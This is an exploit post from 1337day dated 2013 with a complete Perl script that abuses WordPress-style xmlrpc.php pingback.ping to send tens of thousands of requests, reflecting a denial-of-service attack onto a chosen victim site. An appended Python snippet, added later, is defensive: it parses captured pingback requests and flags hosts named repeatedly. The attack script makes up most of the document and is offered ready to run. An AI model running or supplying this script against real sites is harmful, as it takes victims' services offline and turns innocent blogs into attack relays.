XML-RPC PingBack API Remote DoS Exploit (through xmlrpc.php)
Source: 1337day.com  Author: D35m0nd142  Published: 2013-01-09
#Exploit Title: XML-RPC PingBack API Remote Denial of Service exploit (through xmlrpc.php)
#Date: 04/01/2013
#Category: Remote
#Exploit Author: D35m0nd142
#Tested on: (Debian) Linux
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use IO::Socket::INET;
system("clear");
print "***************************************************************************************\n";
print "*               XML-RPC PingBack API Remote Denial of Service exploit                 *\n";
print "*      Usage: ./exploit.pl <xml_website> <target> <requests count> <real_article>     *\n";
print "*   Example: ./exploit.pl www.myblog.com www.victim.com 50000 /blog/virus-protection/ *\n";
print "*                             Created by D35m0nd142                                   *\n";
print "***************************************************************************************\n\n";
my $target = $ARGV[1] ;
my $xml_site = $ARGV[0];
my $article = $ARGV[3];
my $count = $ARGV[2];
if($count eq '' || $article eq '' || $xml_site eq '' || $target eq '')
{
print "\n[!] Usage: ./exploit.pl <xml_website> <target> <requests count> <real article>\n\n";
exit(1);
}

if($target !~ /http:\/\//)
{
$target = "http://$target";
}
if($xml_site !~ /http:\/\//)
{
$xml_site = "http://$xml_site";
}

$full = $target.$article;
sleep 1;

$text = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$target</string></value></param><param><value><string>$full</string></value></param></params></methodCall>";
$request_length= length $text;

print "Sending POST requests . . \n";

$filename = "pingback.txt";
open(FILE , "> $filename");
for($i=1;$i<=$count;$i++)
{
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0] , PeerPort => 'http(80)', Proto => 'tcp'); #You can change 'PeerPort' if you need
$request = "POST /xmlrpc.php HTTP/1.1\r\nHost: $ARGV[0]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: $request_length\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$ARGV[1]</string></value></param><param><value><string>$ARGV[0]$ARGV[3]</string></value></param></params></methodCall>\r\n\r\n";
sleep 1;
print $request;
print $sock $request;
while(<$sock>)
{
print FILE;
}

}
#system("rm pingback.txt"); //If you want to save all connections made in pingback.txt file, remove '#' .
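
Added example, not part of the original post or its author's code: a defender-side check for a site whose xmlrpc.php receives requests like the one built above. It parses captured XML-RPC request bodies and reports source hosts named in repeated pingback.ping calls; the function names, the threshold of 3 and the sample records are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlparse
THRESHOLD = 3  # assumed limit: pingbacks naming one source host per log window

def parse_pingback(body: bytes):
    """Return (source_uri, target_uri) if body is a pingback.ping call, else None."""
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return None  # refuse DTDs outright: no entity expansion in the log parser
    try:
        root = ET.fromstring(body)
    except (ET.ParseError, LookupError, ValueError):
        return None
    if root.tag != "methodCall" or (root.findtext("methodName") or "").strip() != "pingback.ping":
        return None
    # XML-RPC strings may be <value><string>x</string></value> or bare <value>x</value>
    values = ["".join(v.itertext()).strip() for v in root.findall("params/param/value")]
    return tuple(values) if len(values) == 2 else None

def flag_reflection(records, threshold=THRESHOLD):
    """Map source host -> count for hosts named in >= threshold pingback.ping bodies."""
    hits = Counter()
    for _client_ip, body in records:  # records: (client_ip, raw_body) pairs
        parsed = parse_pingback(body)
        if parsed is None:
            continue
        src = parsed[0]  # the script above can send this without a scheme
        try:
            host = urlparse(src if "//" in src else "//" + src).hostname
        except ValueError:  # malformed bracketed host in the URI
            continue
        if host:
            hits[host] += 1
    return {h: n for h, n in hits.items() if n >= threshold}

def sample_body(source: bytes, target: bytes) -> bytes:
    # constructed request body in the same shape the script above sends
    return (b"<?xml version='1.0' encoding='iso-8859-1'?><methodCall>"
            b"<methodName>pingback.ping</methodName><params>"
            b"<param><value><string>" + source + b"</string></value></param>"
            b"<param><value><string>" + target + b"</string></value></param>"
            b"</params></methodCall>")

# Constructed sample: documentation-range IPs and .example hosts, not real traffic
SAMPLE = (
    [("198.51.100.7", sample_body(b"victim.example", b"http://blog.example/post/"))] * 4
    + [("203.0.113.9", sample_body(b"http://friend.example/a", b"http://blog.example/post/"))]
    + [("198.51.100.7", b"<!DOCTYPE x [<!ENTITY a 'b'>]><methodCall/>")]
)
```

Web-server access logs do not record POST bodies, so the records have to come from a reverse proxy or WAF that captures them.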
					
					

 